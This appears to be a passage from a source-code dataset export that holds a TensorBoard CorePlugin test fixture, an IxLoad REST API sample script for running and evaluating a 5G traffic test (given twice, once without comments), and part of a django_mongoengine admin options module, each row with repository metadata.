parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertNotIn("experiment_name", parsed_object)
self.assertNotIn("experiment_description", parsed_object)
self.assertNotIn("creation_time", parsed_object)
class CorePluginTestBase(object):
    """Shared fixture for CorePlugin tests.

    Builds a TensorBoard WSGI app whose CorePlugin is backed by an
    EventMultiplexer reading from a temporary logdir, and exposes a
    werkzeug test client as ``self.server``.
    """

    def setUp(self):
        super(CorePluginTestBase, self).setUp()
        self.logdir = self.get_temp_dir()
        self.multiplexer = event_multiplexer.EventMultiplexer()
        context = base_plugin.TBContext(
            assets_zip_provider=get_test_assets_zip_provider(),
            logdir=self.logdir,
            multiplexer=self.multiplexer,
        )
        self.plugin = core_plugin.CorePlugin(context)
        app = application.TensorBoardWSGI([self.plugin])
        self.server = werkzeug_test.Client(app, wrappers.BaseResponse)

    def create_multiplexer(self):
        # Subclasses must provide the multiplexer implementation under test.
        raise NotImplementedError()

    def _add_run(self, run_name):
        # Write a single test summary into <logdir>/<run_name>, then reload
        # the multiplexer so the new run becomes visible to the plugin.
        run_path = os.path.join(self.logdir, run_name)
        with test_util.FileWriter(run_path) as writer:
            writer.add_test_summary("foo")
        self.multiplexer.AddRunsFromDirectory(self.logdir)
        self.multiplexer.Reload()

    def _get_json(self, server, path):
        # GET `path`, assert a 200 JSON response, and return the parsed body.
        response = server.get(path)
        self.assertEqual(200, response.status_code)
        self.assertEqual(
            "application/json", response.headers.get("Content-Type")
        )
        return json.loads(response.get_data().decode("utf-8"))

    def testRuns(self):
        self._add_run("run1")
        run_json = self._get_json(self.server, "/data/runs")
        self.assertEqual(run_json, ["run1"])

    def testRunsAppendOnly(self):
        """Runs are ordered by first-event wall time; timestamp-less runs last."""
        # Stubbed wall times per run; None simulates a run for which no
        # event timestamp can be determined.
        fake_wall_times = {
            "run1": 1234.0,
            "avocado": 2345.0,
            "zebra": 3456.0,
            "ox": 4567.0,
            "mysterious": None,
            "enigmatic": None,
        }

        def FirstEventTimestamp_stub(run_name):
            # Match the (path-suffixed) run name against exactly one entry.
            matches = [
                candidate_name
                for candidate_name in fake_wall_times
                if run_name.endswith(candidate_name)
            ]
            self.assertEqual(len(matches), 1, "%s (%s)" % (matches, run_name))
            wall_time = fake_wall_times[matches[0]]
            if wall_time is None:
                raise ValueError("No event timestamp could be found")
            else:
                return wall_time

        with mock.patch.object(
            self.multiplexer, "FirstEventTimestamp"
        ) as mock_first_event_timestamp:
            mock_first_event_timestamp.side_effect = FirstEventTimestamp_stub
            self._add_run("run1")
            self._add_run("avocado")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"), ["run1", "avocado"],
            )
            self._add_run("zebra")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra"],
            )
            self._add_run("mysterious")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "mysterious"],
            )
            # Add another timestamped run: it should come before the timestamp-less one.
            self._add_run("ox")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "ox", "mysterious"],
            )
            # Add another timestamp-less run, lexicographically before the other one:
            # it should come after all timestamped runs but first among timestamp-less.
            self._add_run("enigmatic")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "ox", "enigmatic", "mysterious"],
            )
def get_test_assets_zip_provider():
    """Build a fake frontend asset bundle for tests.

    Returns a zero-argument callable that, on each invocation, yields a
    fresh ``contextlib.closing``-wrapped file object over a zip archive
    containing a single ``index.html`` entry (``FAKE_INDEX_HTML``).
    """
    # io.BytesIO is the stdlib equivalent of the legacy six.BytesIO alias
    # (six just re-exports it); function-scope import keeps the change local.
    import io

    memfile = io.BytesIO()
    with zipfile.ZipFile(
        memfile, mode="w", compression=zipfile.ZIP_DEFLATED
    ) as zf:
        zf.writestr("index.html", FAKE_INDEX_HTML)
    # Each call gets an independent read cursor over a copy of the bytes.
    return lambda: contextlib.closing(io.BytesIO(memfile.getvalue()))
if __name__ == "__main__":
tf.test.main()
| true | true |
f7231aa7882c5a7b70caf14173f985b835db854c | 6,685 | py | Python | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 10 | 2018-03-01T11:41:01.000Z | 2022-02-22T18:05:34.000Z | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 5 | 2018-11-02T07:46:51.000Z | 2021-05-24T16:30:29.000Z | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 12 | 2018-05-08T19:38:57.000Z | 2022-02-01T19:14:51.000Z | # Description
# A sample Python REST API script to:
# - Load a saved configuration file
# - Run traffic
# - Get stats and evaluate for user defined expected stat values.
# - Get test result
#
# - For IxLoad Gateway running in Windows only. Linux Gateway is not supported at this time.
# - This script will set the license model to "Perpetual Mode". This is a 5G requirement.
#
# If the saved config file is located on a remote pc, this script could upload it to the gateway.
# Otherwise, the saved config file must be already in the IxLoad API gateway server.
#
# Requirements
# IxL_RestApi.py
# Air Mosaic installed in the Windows OS where IxLoad is installed
# The Air Mosaic version must be the same version as IxLoad for compatibility
# 5G cell
import os, sys, time, signal, traceback, platform
# Insert the Modules path to env in order to import IxL_RestApi.py
currentDir = os.path.abspath(os.path.dirname(__file__))
# Automatically create the os path to the IxL_RestApi.py module for this script to use
if platform.system() == 'Windows':
sys.path.insert(0, (currentDir.replace('SampleScripts\\LoadSavedConfigFile', 'Modules')))
else:
sys.path.insert(0, (currentDir.replace('SampleScripts/LoadSavedConfigFile', 'Modules')))
from IxL_RestApi import *
# ---- Test configuration constants (edit these for your environment) ----

# Choices of IxLoad Gateway server OS: linux or windows
serverOs = 'windows'

# Which IxLoad version are you using for your test?
# To view all the installed versions, go on a web browser and enter:
#    http://<server ip>:8080/api/v0/applicationTypes
ixLoadVersion = '9.10.115.43'   ;# EA

# Do you want to delete the session at the end of the test or if the test failed?
deleteSession = True
forceTakePortOwnership = True

# API-Key: Use your user API-Key if you want added security
apiKey = None

# The saved config file to load
rxfFile = '5G-eLSU_HTTP_UXM_stats.rxf'

if serverOs == 'windows':
    apiServerIp = '192.168.129.6'

    # Where to store all of the csv result files in Windows
    resultsDir = 'c:\\Results'

    # Where to upload the config file or where to tell IxLoad the location if you're not uploading it.
    rxfFileOnServer = 'C:\\Results\\{}'.format(rxfFile)

# Where to put the downloaded csv results
saveResultsInPath = currentDir

# Do you need to upload your saved config file to the server?
# If not, a saved config must be already in the IxLoad gateway server filesystem.
upLoadFile = True

# On the local host where you are running this script.
# The path to the saved config file. In this example, get it from the current folder.
if platform.system() == 'Linux':
    localConfigFileToUpload = '{}/{}'.format(currentDir, rxfFile)
else:
    localConfigFileToUpload = '{}\\{}'.format(currentDir, rxfFile)

# The path where you want to download the csv result files to.  This is mostly used if using a Linux Gateway server.
# If you're using IxLoad in Windows, SSH must be installed.  Otherwise, this variable will be ignored.
scpDestPath = currentDir

# For IxLoad versions prior to 8.50 that doesn't have the rest api to download results.
# Set to True if you want to save run time stat results to CSV files.
saveStatsToCsvFile = True

apiServerIpPort = 8443 ;# http=8080.  https=8443 (https is supported starting 8.50)

licenseServerIp = '192.168.129.6'
# For 5G, the license model must be Perpetual Mode
licenseModel = 'Perpetual Mode'

# To assign ports for testing.  Format = (cardId,portId)
# Traffic1@Network1 are activity names.
# To get the Activity names, got to: /ixload/test/activeTest/communityList
communityPortList1 = {
    'chassisIp': '192.168.129.15',
    'Traffic2@Network1': [(1,1)],
}

communityPortList2 = {
    'chassisIp': '192.168.129.15',
    'Traffic1@SGi': [(1,2)],
}

# Stat names to display at run time.
# To see how to get the stat names, go to the link below for step-by-step guidance:
#     https://www.openixia.com/tutorials?subject=ixLoad/getStatName&page=fromApiBrowserForRestApi.html
#
# What this does:
#    Get run time stats and evaluate the stats with an operator and the expected value.
#    Due to stats going through ramp up and ramp down, stats will fluctuate.
#    Once the stat hits and maintains the expected threshold value, the stat is marked as passed.
#
#    If evaluating stats at run time is not what you need, use PollStats() instead shown
#    in sample script LoadConfigFile.py
#
# operator options:  None, >, <, <=, >=
statsDict = {
    'HTTPClient': [{'caption': 'Rx Rate (Kbps)', 'operator': '>', 'expect': 5000000}]
}

#NRstatsDict = {
#    'UESIM-NRLayer1Statistics': [{'caption': "CRC OK TBs - PDSCH", 'operator': '>', 'expect': 1000)}]
#}
# Defined up front so the exception handlers below can safely test it: if
# Main() or connect() raises before restObj is fully usable, the handlers
# previously crashed with a NameError that masked the real failure.
restObj = None

try:
    restObj = Main(apiServerIp=apiServerIp,
                   apiServerIpPort=apiServerIpPort,
                   osPlatform=serverOs,
                   deleteSession=deleteSession,
                   pollStatusInterval=1,
                   apiKey=apiKey,
                   generateRestLogFile=True)

    # sessionId is an opened existing session that you like to connect to
    # instead of starting a new session.
    restObj.connect(ixLoadVersion, sessionId=None, timeout=120)
    restObj.configLicensePreferences(licenseServerIp=licenseServerIp, licenseModel=licenseModel)
    restObj.setResultDir(resultsDir, createTimestampFolder=True)

    if upLoadFile == True:
        restObj.uploadFile(localConfigFileToUpload, rxfFileOnServer)

    restObj.loadConfigFile(rxfFileOnServer)
    restObj.assignChassisAndPorts([communityPortList1, communityPortList2])

    if forceTakePortOwnership:
        restObj.enableForceOwnership()

    # Optional: Modify the sustain time
    #restObj.configTimeline(name='Timeline1', sustainTime=12)

    runTestOperationsId = restObj.runTraffic()

    # Blocks while polling run-time stats and checking them against statsDict.
    restObj.pollStatsAndCheckStatResults(statsDict,
                                         csvFile=saveStatsToCsvFile,
                                         csvFilePrependName=None,
                                         pollStatInterval=2,
                                         exitAfterPollingIteration=None)

    testResult = restObj.getTestResults()
    restObj.waitForActiveTestToUnconfigure()
    restObj.downloadResults(targetPath=saveResultsInPath)
    restObj.retrievePortCaptureFileForAssignedPorts(currentDir)

    if deleteSession:
        restObj.deleteSessionId()

except (IxLoadRestApiException, Exception) as errMsg:
    print('\n%s' % traceback.format_exc())
    # Only attempt cleanup if the session object was actually created.
    if deleteSession and restObj is not None:
        restObj.abortActiveTest()
        restObj.deleteSessionId()
    sys.exit(errMsg)

except KeyboardInterrupt:
    print('\nCTRL-C detected.')
    if deleteSession and restObj is not None:
        restObj.abortActiveTest()
        restObj.deleteSessionId()
| 36.530055 | 116 | 0.706058 |
import os, sys, time, signal, traceback, platform
currentDir = os.path.abspath(os.path.dirname(__file__))
if platform.system() == 'Windows':
sys.path.insert(0, (currentDir.replace('SampleScripts\\LoadSavedConfigFile', 'Modules')))
else:
sys.path.insert(0, (currentDir.replace('SampleScripts/LoadSavedConfigFile', 'Modules')))
from IxL_RestApi import *
serverOs = 'windows'
ixLoadVersion = '9.10.115.43' ;
deleteSession = True
forceTakePortOwnership = True
apiKey = None
rxfFile = '5G-eLSU_HTTP_UXM_stats.rxf'
if serverOs == 'windows':
apiServerIp = '192.168.129.6'
resultsDir = 'c:\\Results'
rxfFileOnServer = 'C:\\Results\\{}'.format(rxfFile)
# Where to put the downloaded csv results
saveResultsInPath = currentDir
# Do you need to upload your saved config file to the server?
# If not, a saved config must be already in the IxLoad gateway server filesystem.
upLoadFile = True
# On the local host where you are running this script.
# The path to the saved config file. In this example, get it from the current folder.
if platform.system() == 'Linux':
localConfigFileToUpload = '{}/{}'.format(currentDir, rxfFile)
else:
localConfigFileToUpload = '{}\\{}'.format(currentDir, rxfFile)
# The path where you want to download the csv result files to. This is mostly used if using a Linux Gateway server.
# If you're using IxLoad in Windows, SSH must be installed. Otherwise, this variable will be ignored.
scpDestPath = currentDir
# Set to True if you want to save run time stat results to CSV files.
saveStatsToCsvFile = True
apiServerIpPort = 8443 ;# http=8080. https=8443 (https is supported starting 8.50)
licenseServerIp = '192.168.129.6'
# For 5G, the license model must be Perpetual Mode
licenseModel = 'Perpetual Mode'
# To assign ports for testing. Format = (cardId,portId)
# Traffic1@Network1 are activity names.
# To get the Activity names, got to: /ixload/test/activeTest/communityList
communityPortList1 = {
'chassisIp': '192.168.129.15',
'Traffic2@Network1': [(1,1)],
}
communityPortList2 = {
'chassisIp': '192.168.129.15',
'Traffic1@SGi': [(1,2)],
}
# Stat names to display at run time.
# To see how to get the stat names, go to the link below for step-by-step guidance:
# https://www.openixia.com/tutorials?subject=ixLoad/getStatName&page=fromApiBrowserForRestApi.html
#
# What this does:
# Get run time stats and evaluate the stats with an operator and the expected value.
# Due to stats going through ramp up and ramp down, stats will fluctuate.
# Once the stat hits and maintains the expected threshold value, the stat is marked as passed.
#
# If evaluating stats at run time is not what you need, use PollStats() instead shown
# in sample script LoadConfigFile.py
#
# operator options: None, >, <, <=, >=
statsDict = {
'HTTPClient': [{'caption': 'Rx Rate (Kbps)', 'operator': '>', 'expect': 5000000}]
}
#NRstatsDict = {
# 'UESIM-NRLayer1Statistics': [{'caption': "CRC OK TBs - PDSCH", 'operator': '>', 'expect': 1000)}]
#}
try:
restObj = Main(apiServerIp=apiServerIp,
apiServerIpPort=apiServerIpPort,
osPlatform=serverOs,
deleteSession=deleteSession,
pollStatusInterval=1,
apiKey=apiKey,
generateRestLogFile=True)
# sessionId is an opened existing session that you like to connect to instead of starting a new session.
restObj.connect(ixLoadVersion, sessionId=None, timeout=120)
restObj.configLicensePreferences(licenseServerIp=licenseServerIp, licenseModel=licenseModel)
restObj.setResultDir(resultsDir, createTimestampFolder=True)
if upLoadFile == True:
restObj.uploadFile(localConfigFileToUpload, rxfFileOnServer)
restObj.loadConfigFile(rxfFileOnServer)
restObj.assignChassisAndPorts([communityPortList1, communityPortList2])
if forceTakePortOwnership:
restObj.enableForceOwnership()
# Optional: Modify the sustain time
#restObj.configTimeline(name='Timeline1', sustainTime=12)
runTestOperationsId = restObj.runTraffic()
restObj.pollStatsAndCheckStatResults(statsDict,
csvFile=saveStatsToCsvFile,
csvFilePrependName=None,
pollStatInterval=2,
exitAfterPollingIteration=None)
testResult = restObj.getTestResults()
restObj.waitForActiveTestToUnconfigure()
restObj.downloadResults(targetPath=saveResultsInPath)
restObj.retrievePortCaptureFileForAssignedPorts(currentDir)
if deleteSession:
restObj.deleteSessionId()
except (IxLoadRestApiException, Exception) as errMsg:
print('\n%s' % traceback.format_exc())
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
sys.exit(errMsg)
except KeyboardInterrupt:
print('\nCTRL-C detected.')
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
| true | true |
f7231bd8d0e0d5858827428b813f77eb1621f255 | 24,092 | py | Python | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | import operator
from functools import reduce, partial
from django import forms
from django.forms.formsets import all_valid
from django.urls import reverse
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin import widgets, helpers
from django.contrib.admin.utils import (
unquote, flatten_fieldsets, get_deleted_objects,
)
from django.contrib.admin.options import (
TO_FIELD_VAR, IS_POPUP_VAR,
get_ul_class, csrf_protect_m,
)
from django.utils.html import escape
from django.core.exceptions import PermissionDenied
try:
from django.db.models.related import RelatedObject
except ImportError:
from django.db.models.fields.related import ForeignObjectRel as RelatedObject # noqa
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from django.forms.forms import pretty_name
from django.forms.models import modelform_defines_fields
from django.conf import settings
from django.apps import apps
from mongoengine import Q
from django_mongoengine.utils import force_text
from django_mongoengine.fields import (ListField, EmbeddedDocumentField,
ReferenceField, StringField)
from django_mongoengine.mongo_admin.util import RelationWrapper
from django_mongoengine.utils.wrappers import copy_class
from django_mongoengine.utils.monkey import get_patched_django_module
from django_mongoengine.forms.documents import (
DocumentForm, documentform_factory, documentformset_factory,
inlineformset_factory, BaseInlineDocumentFormSet)
def get_content_type_for_model(obj):
    # Stand-in for django.contrib.admin.options.get_content_type_for_model:
    # mongoengine documents have no ContentType rows, so return a fresh,
    # unsaved ContentType instance.  `obj` is intentionally ignored.
    return apps.get_model("contenttypes.ContentType")()
# Patched copy of django.contrib.admin.options whose module-level
# get_content_type_for_model is replaced by the stub defined above, so the
# stock ModelAdmin machinery can operate on mongoengine documents.
djmod = get_patched_django_module(
    "django.contrib.admin.options",
    get_content_type_for_model=get_content_type_for_model,
)
class BaseDocumentAdmin(djmod.ModelAdmin):
    """Functionality common to both ModelAdmin and InlineAdmin."""
    form = DocumentForm

    def formfield_for_dbfield(self, db_field, **kwargs):
        """
        Hook for specifying the form Field instance for a given database Field
        instance.

        If kwargs are given, they're passed to the form Field's constructor.
        """
        # `request` is popped so it is not forwarded to formfield()
        # constructors that do not accept it.
        request = kwargs.pop("request", None)

        # If the field specifies choices, we don't need to look for special
        # admin widgets - we just need to use a select widget of some kind.
        if db_field.choices is not None:
            return self.formfield_for_choice_field(db_field, request, **kwargs)

        # A ListField of references is the mongoengine analogue of a
        # many-to-many relation.
        if isinstance(db_field, ListField) and isinstance(db_field.field, ReferenceField):
            return self.formfield_for_manytomany(db_field, request, **kwargs)

        # handle RelatedFields
        if isinstance(db_field, ReferenceField):
            # For non-raw_id fields, wrap the widget with a wrapper that adds
            # extra HTML -- the "add other" interface -- to the end of the
            # rendered output. formfield can be None if it came from a
            # OneToOneField with parent_link=True or a M2M intermediary.
            form_field = db_field.formfield(**kwargs)
            if db_field.name not in self.raw_id_fields:
                # "Add another" is only offered when the related document has
                # a registered admin and the user may add instances.
                related_modeladmin = self.admin_site._registry.get(db_field.document_type)
                can_add_related = bool(related_modeladmin and
                                       related_modeladmin.has_add_permission(request))
                form_field.widget = widgets.RelatedFieldWidgetWrapper(
                    form_field.widget, RelationWrapper(db_field.document_type), self.admin_site,
                    can_add_related=can_add_related)
            return form_field

        if isinstance(db_field, StringField):
            # Unbounded strings get a textarea; bounded ones a text input.
            if db_field.max_length is None:
                kwargs = dict({'widget': widgets.AdminTextareaWidget}, **kwargs)
            else:
                kwargs = dict({'widget': widgets.AdminTextInputWidget}, **kwargs)
            return db_field.formfield(**kwargs)

        # If we've got overrides for the formfield defined, use 'em. **kwargs
        # passed to formfield_for_dbfield override the defaults.
        for klass in db_field.__class__.mro():
            if klass in self.formfield_overrides:
                kwargs = dict(self.formfield_overrides[klass], **kwargs)
                return db_field.formfield(**kwargs)

        # For any other type of field, just call its formfield() method.
        return db_field.formfield(**kwargs)

    def formfield_for_choice_field(self, db_field, request=None, **kwargs):
        """
        Get a form Field for a database Field that has declared choices.
        """
        # If the field is named as a radio_field, use a RadioSelect
        if db_field.name in self.radio_fields:
            # Avoid stomping on custom widget/choices arguments.
            if 'widget' not in kwargs:
                kwargs['widget'] = widgets.AdminRadioSelect(attrs={
                    'class': get_ul_class(self.radio_fields[db_field.name]),
                })
            if 'choices' not in kwargs:
                kwargs['choices'] = db_field.get_choices(
                    include_blank = db_field.blank,
                    blank_choice=[('', _('None'))]
                )
        return db_field.formfield(**kwargs)

    def formfield_for_manytomany(self, db_field, request=None, **kwargs):
        """
        Get a form Field for a ManyToManyField.
        """
        db = kwargs.get('using')

        if db_field.name in self.raw_id_fields:
            kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel, using=db)
            kwargs['help_text'] = ''
        elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
            kwargs['widget'] = widgets.FilteredSelectMultiple(pretty_name(db_field.name), (db_field.name in self.filter_vertical))

        return db_field.formfield(**kwargs)

    def get_view_on_site_url(self, obj=None):
        # Mirrors ModelAdmin.get_view_on_site_url, but with a dummy
        # content_type_id of 0 since mongoengine has no ContentType rows.
        if obj is None or not self.view_on_site:
            return None

        if callable(self.view_on_site):
            return self.view_on_site(obj)
        elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
            # use the ContentType lookup if view_on_site is True
            return reverse('admin:view_on_site', kwargs={
                'content_type_id': 0,
                'object_id': obj.pk
            })
@copy_class(djmod.ModelAdmin)
class DocumentAdmin(BaseDocumentAdmin):
    "Encapsulates all admin options and functionality for a given model."

    def __init__(self, model, admin_site):
        self.model = model
        self.opts = model._meta
        self.admin_site = admin_site
        super(DocumentAdmin, self).__init__(model, admin_site)
        # LogEntry rows require a relational database; skip logging when only
        # the dummy backend is configured.
        self.log = not settings.DATABASES.get('default', {}).get(
            'ENGINE', 'django.db.backends.dummy'
        ).endswith('dummy')

        self.change_list_template = 'admin/change_document_list.html'

    # XXX: add inline init somewhere
    def _get_inline_instances(self):
        """Build inline admin instances for embedded-document fields.

        Scans the document's fields for EmbeddedDocumentField (single) and
        ListField-of-EmbeddedDocumentField (many) entries and appends a
        matching inline admin for each to ``self.inline_instances``.
        NOTE(review): nothing visible here initializes self.inline_instances
        or calls this method (see XXX above) -- confirm before relying on it.
        """
        # Normalize exclude so membership tests and appends below are safe.
        if self.exclude is None:
            self.exclude = []
        # Iterate field objects, not (name, field) items: the isinstance
        # checks and f.name below operate on the field instances.
        for f in self.model._fields.values():
            if not (isinstance(f, ListField) and isinstance(getattr(f, 'field', None), EmbeddedDocumentField)) and not isinstance(f, EmbeddedDocumentField):
                continue
            # Should only reach here if there is an embedded document...
            if f.name in self.exclude:
                continue
            document = self.model()
            if hasattr(f, 'field') and f.field is not None:
                embedded_document = f.field.document_type
            elif hasattr(f, 'document_type'):
                embedded_document = f.document_type
            else:
                # For some reason we found an embedded field were either
                # the field attribute or the field's document type is None.
                # This shouldn't happen, but apparently does happen:
                # https://github.com/jschrewe/django-mongoadmin/issues/4
                # The solution for now is to ignore that field entirely.
                continue

            inline_admin = EmbeddedStackedDocumentAdmin
            # check if there is an admin for the embedded document in
            # self.inlines. If there is, use this, else use default.
            for inline_class in self.inlines:
                if inline_class.document == embedded_document:
                    inline_admin = inline_class

            inline_instance = inline_admin(f, document, self.admin_site)

            # if f is an EmbeddedDocumentField set the maximum allowed form instances to one
            if isinstance(f, EmbeddedDocumentField):
                inline_instance.max_num = 1
                # exclude field from normal form
                if f.name not in self.exclude:
                    self.exclude.append(f.name)

            if f.name == 'created_at' and f.name not in self.exclude:
                self.exclude.append(f.name)

            self.inline_instances.append(inline_instance)

    def get_changelist_form(self, request, **kwargs):
        """
        Returns a Form class for use in the Formset on the changelist page.
        """
        defaults = {
            "formfield_callback": partial(self.formfield_for_dbfield, request=request),
        }
        defaults.update(kwargs)
        if defaults.get('fields') is None and not modelform_defines_fields(defaults.get('form')):
            defaults['fields'] = forms.ALL_FIELDS
        return documentform_factory(self.model, **defaults)

    def get_changelist_formset(self, request, **kwargs):
        """
        Returns a FormSet class for use on the changelist page if list_editable
        is used.
        """
        defaults = {
            "formfield_callback": partial(self.formfield_for_dbfield, request=request),
        }
        defaults.update(kwargs)
        return documentformset_factory(
            self.model, self.get_changelist_form(request), extra=0,
            fields=self.list_editable, **defaults
        )

    def get_changelist(self, request, **kwargs):
        """
        Returns the ChangeList class for use on the changelist page.
        """
        from django_mongoengine.mongo_admin.views import DocumentChangeList
        return DocumentChangeList

    def log_addition(self, request, object, message):
        """
        Log that an object has been successfully added.

        The default implementation creates an admin LogEntry object.
        No-op when no relational database is configured (see __init__).
        """
        if not self.log:
            return
        super(DocumentAdmin, self).log_addition(request, object, message)

    def log_change(self, request, object, message):
        """
        Log that an object has been successfully changed.

        The default implementation creates an admin LogEntry object.
        No-op when no relational database is configured (see __init__).
        """
        if not self.log:
            return
        super(DocumentAdmin, self).log_change(request, object, message)

    def log_deletion(self, request, object, object_repr):
        """
        Log that an object will be deleted. Note that this method is called
        before the deletion.

        The default implementation creates an admin LogEntry object.
        No-op when no relational database is configured (see __init__).
        """
        if not self.log:
            return
        super(DocumentAdmin, self).log_deletion(request, object, object_repr)

    @property
    def media(self):
        # Re-expose ModelAdmin.media; copy_class copies attributes, so the
        # property is restated here explicitly.
        return djmod.ModelAdmin.media.fget(self)

    @csrf_protect_m
    def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
        """Combined add/change view for a document (mirrors ModelAdmin)."""
        to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
        if to_field and not self.to_field_allowed(request, to_field):
            raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)

        model = self.model
        opts = model._meta

        # "Save as new" re-enters the add path with no object id.
        if request.method == 'POST' and '_saveasnew' in request.POST:
            object_id = None

        add = object_id is None

        if add:
            if not self.has_add_permission(request):
                raise PermissionDenied
            obj = None
        else:
            obj = self.get_object(request, unquote(object_id), to_field)

            if not self.has_change_permission(request, obj):
                raise PermissionDenied

            if obj is None:
                raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
                    'name': force_text(opts.verbose_name), 'key': escape(object_id)})

        ModelForm = self.get_form(request, obj)
        if request.method == 'POST':
            form = ModelForm(request.POST, request.FILES, instance=obj)
            if form.is_valid():
                form_validated = True
                new_object = self.save_form(request, form, change=not add)
            else:
                form_validated = False
                new_object = form.instance
            formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
            if all_valid(formsets) and form_validated:
                self.save_model(request, new_object, form, not add)
                self.save_related(request, form, formsets, not add)
                change_message = self.construct_change_message(request, form, formsets, add)
                if add:
                    self.log_addition(request, new_object, change_message)
                    return self.response_add(request, new_object)
                else:
                    self.log_change(request, new_object, change_message)
                    return self.response_change(request, new_object)
            else:
                form_validated = False
        else:
            if add:
                initial = self.get_changeform_initial_data(request)
                form = ModelForm(initial=initial)
                formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
            else:
                form = ModelForm(instance=obj)
                formsets, inline_instances = self._create_formsets(request, obj, change=True)

        adminForm = helpers.AdminForm(
            form,
            list(self.get_fieldsets(request, obj)),
            self.get_prepopulated_fields(request, obj),
            self.get_readonly_fields(request, obj),
            model_admin=self)
        media = self.media + adminForm.media

        inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
        for inline_formset in inline_formsets:
            media = media + inline_formset.media

        context = dict(self.admin_site.each_context(request),
            title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
            adminform=adminForm,
            object_id=object_id,
            original=obj,
            is_popup=(IS_POPUP_VAR in request.POST or
                      IS_POPUP_VAR in request.GET),
            to_field=to_field,
            media=media,
            inline_admin_formsets=inline_formsets,
            errors=helpers.AdminErrorList(form, formsets),
            preserved_filters=self.get_preserved_filters(request),
        )

        # Hide the "Save" and "Save and continue" buttons if "Save as New" was
        # previously chosen to prevent the interface from getting confusing.
        if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
            context['show_save'] = False
            context['show_save_and_continue'] = False
            # Use the change template instead of the add template.
            add = False

        context.update(extra_context or {})

        return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)

    @csrf_protect_m
    def delete_view(self, request, object_id, extra_context=None):
        "The 'delete' admin view for this model."
        opts = self.model._meta
        app_label = opts.app_label

        to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
        if to_field and not self.to_field_allowed(request, to_field):
            raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)

        obj = self.get_object(request, unquote(object_id), to_field)

        if not self.has_delete_permission(request, obj):
            raise PermissionDenied

        if obj is None:
            raise Http404(
                _('%(name)s object with primary key %(key)r does not exist.') %
                {'name': force_text(opts.verbose_name), 'key': escape(object_id)}
            )

        from django.db import router
        using = router.db_for_write(self.model)

        # Populate deleted_objects, a data structure of all related objects that
        # will also be deleted.
        (deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
            [obj], opts, request.user, self.admin_site, using)

        if request.POST:  # The user has already confirmed the deletion.
            if perms_needed:
                raise PermissionDenied
            obj_display = force_text(obj)
            attr = str(to_field) if to_field else opts.pk.attname
            obj_id = obj.serializable_value(attr)
            self.log_deletion(request, obj, obj_display)
            self.delete_model(request, obj)

            return self.response_delete(request, obj_display, obj_id)

        object_name = force_text(opts.verbose_name)

        if perms_needed or protected:
            title = _("Cannot delete %(name)s") % {"name": object_name}
        else:
            title = _("Are you sure?")

        context = dict(
            self.admin_site.each_context(request),
            title=title,
            object_name=object_name,
            object=obj,
            deleted_objects=deleted_objects,
            model_count=dict(model_count).items(),
            perms_lacking=perms_needed,
            protected=protected,
            opts=opts,
            app_label=app_label,
            preserved_filters=self.get_preserved_filters(request),
            is_popup=(IS_POPUP_VAR in request.POST or
                      IS_POPUP_VAR in request.GET),
            to_field=to_field,
        )
        context.update(extra_context or {})

        return self.render_delete_form(request, context)

    def history_view(self, request, object_id, extra_context=None):
        "The 'history' admin view for this model."
        from django.contrib.admin.models import LogEntry
        # First check if the user can see this history.
        model = self.model
        obj = self.get_object(request, unquote(object_id))
        if obj is None:
            raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
                'name': force_text(model._meta.verbose_name),
                'key': escape(object_id),
            })

        if not self.has_change_permission(request, obj):
            raise PermissionDenied

        # Then get the history for this object.
        opts = model._meta
        app_label = opts.app_label
        action_list = LogEntry.objects.filter(
            object_id=unquote(object_id),
            content_type=get_content_type_for_model(model)
        ).select_related().order_by('action_time')

        context = dict(
